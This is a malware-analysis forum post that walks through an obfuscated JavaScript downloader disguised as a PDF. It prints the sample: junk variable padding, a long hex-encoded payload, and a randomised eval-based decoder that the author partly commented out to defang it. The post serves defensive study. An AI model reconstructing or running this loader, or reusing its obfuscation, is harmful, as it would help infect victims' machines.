Malware Analysis Decoder built after several pseudo random attempts - 6 samples - last sample March 31, 2017

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#1
EDITED :
March,31 2017

- added : https://malwaretips.com/threads/dec...sample-march-31-2017.66860/page-2#post-614554

March,21 2017

- added 3409.js : https://malwaretips.com/threads/5-s...st-sample-20-03-2017.66860/page-2#post-610872
- added in another post differences for BALLANCE-4039.js from 24-12-2016 MV samples
https://malwaretips.com/threads/2-s...er-from-pseudo-random-trys.66860/#post-580177
(Thanks to @Der.Reisende)
- Added : Tomasi-Giovanna.doc.js from 02-01-2016 MV Samples
(Thanks to @silversurfer)

From Malvare Vaulte samples :
Antivirus scan for 61fa0281cb9b8a8c4b3d49bf740c8ef21cffd623c3b9ac094b46e47cdf54e1de at 2016-12-23 14:19:45 UTC - VirusTotal

Thanks to @silversurfer

DOC1042838528-PDF.js

Why this sample ?

Obfuscated anonymous function built in real time by a random function, to decode the obfuscated real part of the downloader : 5 parts, 8 strings available : 8x8x8x8x8 possibilities to build the decoder, but few to build a working one.
I have already shown samples from this family : will show the differences.

As usual I made some modification in several parts, to avoid copy-paste => run => infection :p

1) What it looks like :

The whole code with a lot of useless parts.

Code:
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';


function nikas()
{
    var gnnrz=new Array("xxx","}$%","g.f","h){","e(p","++;","].su","}){");
    return gnnrz[Math.floor(Math['rand'+new Array('om')[0]]()*gnnrz.length)];
}
function mzxbv()
{
    var znhhx="f2650cd343bff58c7655e7e42ee45ff4459b2e58d4916daa51a7c53cca42de072c6e57f6742f5657e2070a6b44aff59f705bc8163bfc44f7c5acd31ec0843f5b44a4d5af641ac9316c4955e0157ecf5af065ace454d6c57a2255f455dfea1fe734dab642dae44d0b4fd654ded540a8057e9b44a6e16b1f4eef55bae15ac0a7ec5542ad042cc846fef16bf70bafc16e4c58f3b53a5b41ac516f4977a6755dc342a825feb140cbf53aa36ee9679d0a54ba75cd8053a8e55d3b42f431ee4f14e0a7bfb665ead6eb577be027ac4904e7118ee36efa77be907af637ec3f62f2062d7d66e6814aab1fda20df014ee4b5bb245afd07ee5b42eed42c9446b9918fa459d5d46de853fca58c1c1edda14bcf71eaf73f3762a8e14d501afcd16f7d43a2a44f9a5ad391ab6616a5e50e2357c205acbd45e9053e311ff520db204eeac5bdf25afe77efe942e7a42dc646ccd18ea145e6653aa758fa252c3e1edee1fece0ddb65fa5350d0f16c091ec9d4ef085ba635abc57eb6542b6142bdc46d1118f9a45dd442a5c57ee742c2b43d6845e0d16ac30bae10be9116e4004dc806fdb06dca1fe4b16fd24daaa44ec853ae842ade43ad444f7e58a4d16eca55dcf57b7b5ab075ae9454ca357ec155eed5daa51ead84eeb55bd415ad887ebc142dc042e4546a2118a1164e2a53a4945d3446eb759e4f58c8a45c3753"+
    "aea74beb59c1c52cfd4fa111ada316f9f50b8357ada5af5c45b6c53eac1fdec0dc6a4bb7b53be65acbf45ce653d244dbf844e3c53fe742c0743beb44e3358d8216afd55e5c57bdf5ac1c5aeef54fbf57a4955d885db7a1ec2258d2143c165aa535aac41aeb316f7f42f0344b3043f8153cf31fd850ddc54bef04bae655bd257ca942c7255ca55ea7b16bca1eb5253ddf44ecc44cdc59e2a44e961fcfb4dd7644f9b53da942b1c43b0a44b8758ee516fd655cbf57f3d5acb45ae8b54d1757a4755e915dda81eaa858b7543dd15ada35ac2d1ade616c0742fa044b0243b3c53f371fb7d0dc1b4bc064bdf850d9843ed158baa55ed542e275ffc059aee58e7116df051a9953c1142eff72e3057d1742ee957ba61eec555ebb57e7a5ad735aaf454ad357ac655d865da651fdae4de0b42b8744e7d4fde44df1251e3e53a4b42cd372ef957a8442a7c57e0470b9a44a2059bd05bcdb63cef44a8b5ab5a1ef8214a095ef7242eb042dca46b280cf8519dd519ceb07a410ef1805e1118cc80ecc307a7f18f0107b7901df607f5518d8904d5002a3a04a0819d2455f3a18df45cd3a46aa951c8c14f151ac0916e0b50da543a4658bf955e9742a305ff6459bdb58a0b1ece644edf53d7045f8d43bac5af0642ab91af8d16eba53fc544c3444fe259f9944b6e1fa9a16e544db7f5ff3650d2216bcd1ec4e17"+
    "f1e53fb944bed44b3759e1a44a411fae44dc9544cb253c3642cd643ca144ee158f5316a4455f6857f775aadf5ab6054cbc57f2a55a765db551ebe044c2c53dd345ab043cb75ac1b42e881af4916c6f50f9457ab35ad3545cc353ddd1fa590dda04bb0153f745abd945b0253cad4dd5e51fbb53e6942f8d72c1857e6242e2857b6670f9f44fe959d8d5bd6063b5f44e265af871eb7b14b6d5ef9442a5c42e2b46db40cc6919ead19f9e14b471ad7c16bb350b8b43c9e58a9155e1c42a725fd6b59c3558c691efee44d5a53f8345cdb43ce45acd542bfb1ab9116ae453c6044e3944fbd59c8544df31fb5216dbe4dfef5fd5750d6616fab1ec9d17e6953fd144a8f44bc359b6f44b3d1faa34dd4844ee253d7a42c5e43a2d44a3558e6116a0655ad957e135aa965ac8654d2b57b9155b035da051eb9044ba453fb245b0243c005af1242a031afdb16e1550a1d57b675aea245a6c53a961fbff0de0e4beb053a975af7745a7853ebc4db0851cad53ad642c2572ced57cf042ee257bb970fcf44baa59ae45bc6f63b8b44ffd5ae5c1efaa14c905ecd642e0342edc46dfc0cf7219fa919c6814b5c1ae2716d8f50bec43df758fd555d7342b395fcd459e4958c8d1ea8f44d2753c6645be543db25ae4842a9a1adf816fdb53b3344a5a44acb59c4244f811fa2c16ae14dde95fb9850d4516c981ed0b17"+
    "ba953e1c44ac444ac659ef544e851fcac4de6144aa953d4342c7c43e5d44f6a58e7816b4655d2d57f985ad6d5ad9854b2b57b8255a675de1b1edf344a3753ca845b8e43f265adbd42afe1af4716e6b50b5b57afa5aafc45d5853a8e1fe410dbbc4bbbb53a8e5ad5545b9053a084dfb744c5a53e5342e4643e0244fbc58cf416c8955db257bca5af865aae054fff57ed255bbb5dc771ead658c3c43ed95ae255adcc1aafc16dab42d0944df543c5b53f891fadb0dec94bcc04bf771fc760db1e4be004bc481ff9c0dc644be714bd5d1fbb00df7e4bbf755d3757d2142a0455d5c5ecb216da91ef5d53c8944a5e44a9d59c1e44e021feaa4da5e44eab53e5642cea43b8244e9758f9f16def55dc857f035aca85ac9354a8857ce755a5f5db271edfe58c9f43c3a5aef55aa5e1acb916dce42a4f44d6343c8553f131ff8b0dddd4bbab4bda150d3b43ac958afc55e7242ac05fc9a59d5258bdf16a3051eb553e5742d6462a7253e695ba8546dfc70b915fcdf5ab1253efc66bc257d7742e0c5ee931ec001ff494dd8242ddf44d3e4fd2d4dc5a40cf257eba44db416f3c50cfe45e7816a150be9816e3058f9d53ceb41cd816a9377b5655ab442aaa5fcba40fa453b066ef6f79dbd54c3b5cf5453e9955b0442daf1ea2014ff565a2d55cf344b0f5fae146ec542acd5fd2858e0251fc418c0270d045f"+
    "ce35af4b53d6b65d384fe5545fd642abe53b8b5bcd579d8d54fed5ce0153d3655bb942f0c14a5a1fc760dcac40a2057c0244b6116a4042adc5bc2946ef370fe75fc7d5afc853dd978a4257b875bb8a53e0816d100bbe816bb814f2d6adc06ae5714c8a16da21dad016db37ba6357d8342acd5ed9f18c2b44a1e57c9858a2252a3e59fca5bede1ea881fa0518e4c42ead59daf65d2842a3044a5b5fae858fd651fdc1eae705cea00bf51fa8f18a2e45c2343a4754f5745b1442da144cd11ef4104c8f1af0716d090fd201ff3d16bf31dd3316fcd14f2a18eff53e674ee1e53ba914f5a0dc1c40b4b57ccf44d9a16c7c42a5a5ba3146c1270c5b5fe115ad7253ca566a2257eaa42d215ec4516a480baa816a2b50e2c45eb418a2f71b3e53c3042aba65a2d46c2253e4c55c6f5fa4e57e3a5aa3b70e8f59ef15adeb52b2d53a9e44b731eec804efb1ffdd16cf11dbf916ad742a775bea946fb170df85fff55abc453e0178e2e57e5f5bc7b53f930db7c44f2953fc842b0643dd344fdb58fbc16f0142de85bcde46d1670cc85fe045acfd53f8a66f5957d2542bdd5ec8d0dffa4bf7b55ac857da242fee55da85eb8b16e1c1ea6a53eb344f8144c5859b7444fed1ffdd4df8844bce53ea142fc643cb144d9958d1c16a4350bf357bae5aa7845da553caf0dd7a4bed74be7e50c1143b3458c8255d0c42"+
    "d045fa2d59b0958b3f16eeb45bd357b5440b8653dfc62d8659c1e62d2253d6b5ba9d46e7d1edab52fee57e4842bc657a7c1acdd16c8f55de457b1c5aaf35ae0d54d6d57d6155aad5dca41fb224da9042e1944b404fe684da4140ed757f7b44e8716fd246e1357a1a42dea5ea3f16f240bb4816b4651d1b53cf342f0162e8153a925bf2146c4370be55fd385ae7b53b1b66a8057b4342b1a5eb231ecb51fc280dd785fff050bfe16e311ef4846b7b57cac42afd5eb501fcaa4de3140cef57a5c44a5e16ae459d5a54bb55cac465f1842c9244a9553ae557a105be1d16e2d0baa216ffd58efa53bba41d3416f4c77a5b55b6b42e4c5ff1f40d2053fc86edb779bf354e055ca5853f6c55da342b961ea5714ed877d0572a2179c5f72d2874e3c18be365a9c42bc644dd053ed757c6e5bf6214fc71fd690da3b59e8a54a045cec165b7f42f6b44bc153b8757b335bfd918bea79ef346deb53fd958fef1efc41fce10dc3859e7a54a285cd5865b3642cb544a9253d5257ded5bf7c18fdf62bb64feb846c5c53e8e16bdb0bcf416d9907d280dddf59bab54bf75cdf365a6742e4f44e7b53dfa57f835bb3418fa261deb44c4a5ffc942efd53bc21eba852e4757def42f5157a1a1faba0de2d59dda54ab05ce1665a5142c4444ed453f0857fa95bcc418a0666e3359d4f45b3e5fd3442da85fe9559a6f58"+
    "d2916a050bccf16fb206f750df0759f3954ec35cc0b65fa142d4344a6c53ca957c655bc3a18ff465a0757d9440fed53da862d4b59f6270dcc5fa225ab9553e441eb5c46df657fb542d5f5ead31ae0816e2504f271ff7f0da6259b0754a455cc1165fa642dc344fab53b0c57c6f5be3518f4a75e945ab0759d1745db253e5d1ea191ff530ddc844ca053f7d42c5643d9f44a2e58cba16d0e55ca157e855aa215ad9b54a6257eb755b6e5db711eadb46f7657fc142fb85eac01aa5216f7750e6357ba95abde45bec53ab41fc8e0dc4a4be4853c6c5ad2445e1053a6416f014ddfe44cfb53d5342d0743b8044fff58d7116f7155b9657c4e5addd5ad5b54bfe57c8055fb25dc8e1ece758cbc43ce65af895afe71ad9a16bb942b2e44efb43a6453ea31fc1d0db8d4bd554ba1555c0d57af942d5a55d405ec4f16d491ef0053dc244c6644f7659afe44e1f1fca34da6644fb953d5c42a1743fa444f2958afe16ced55cdd57b595ac7d5af2954cad57acf55c995df6a1eb8958ae943a765aeba5ac311abe316f6c42d8944de243aa753fdd1fbec0df144badf4bf4251e8253a4742ffd72c7d57c8842e4557f851ec5550f8343d5658f3d55f4242b1e5fa7659edd58ba116d691eedc52a9457b2842dca57c9d1adbd16dc453ea244feb44f0259b8f44a081fbf916f964dc1f5fb0a50a3716c121ecb217"+
    "a8a53bb244abb44df059aa344c131fc5c4da7e45cbe57d3b40d5353b8d62ca959a4862f6353ed35ba4846f5d1efb952f5b57cfe42d3857c021aaa516d6a50d4943f4c58b1155adb42d915fbef59b0258f1a16f161ea9b46f3f57be242a435ea6e1aee916e5953f0244e5344d3359e5b44d2f1fc7f16d934dfa85ff8850b6c16f361ee1a17a0c53b8144e1244e8959f2144eda1fc034ded942daa44e9b4fd054dccb40cbc57d0544a6616a5341fbb45f095eb4416e3b0bfc516e3258f9c53c2741f2b16a3e77bda55eb542c185fd1040cb753fa96ef6279dd354e955cd0853dc655ca142d211eab114f2b61ac765d9b55f2944e125faba46d6742eb118e5365e6f5ea1e53f2b5aab55ae6614c471fd620dbe841df345dd75efcc18fcc64f9f43cb058f0e1ea1346c9957dc942e675ea141fdd10dc9d4ba4755a0257d5a42d6b55fd55eb6116f671eb8753c1544c7c44b9e59f9044f3f1fca516b724dca84bc8d4bea64bb261fd9c0dbd54bb9d4be6e1ffca0d";
    var zfgrg;
    while(true){
        try
        {
            zfgrg=bgnek(znhhx);
            break;
        }
        catch(er)
        {
            var a = 1;
        }
    }
    return zfgrg;
}
function bgnek(tmbxb)
{
//    return (new Function("tjpwq","tefnq","mnigw","var haina=tjpwq.ma"+"tch(/\\S{5}/g),okpbu=\"\",tcgcu=0;while(tcgcu<haina.lengt"+nikas()+"okpbu+=Strin"+nikas()+"romCh"+"arCod"+nikas()+"arseI"+"nt(haina[tcgcu"+nikas()+"bstr(3,"+"2),1"+"6)^54);tcgcu"+nikas()+"}eval(okpbu);")(tmbxb,null,null));
}
mzxbv();

var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
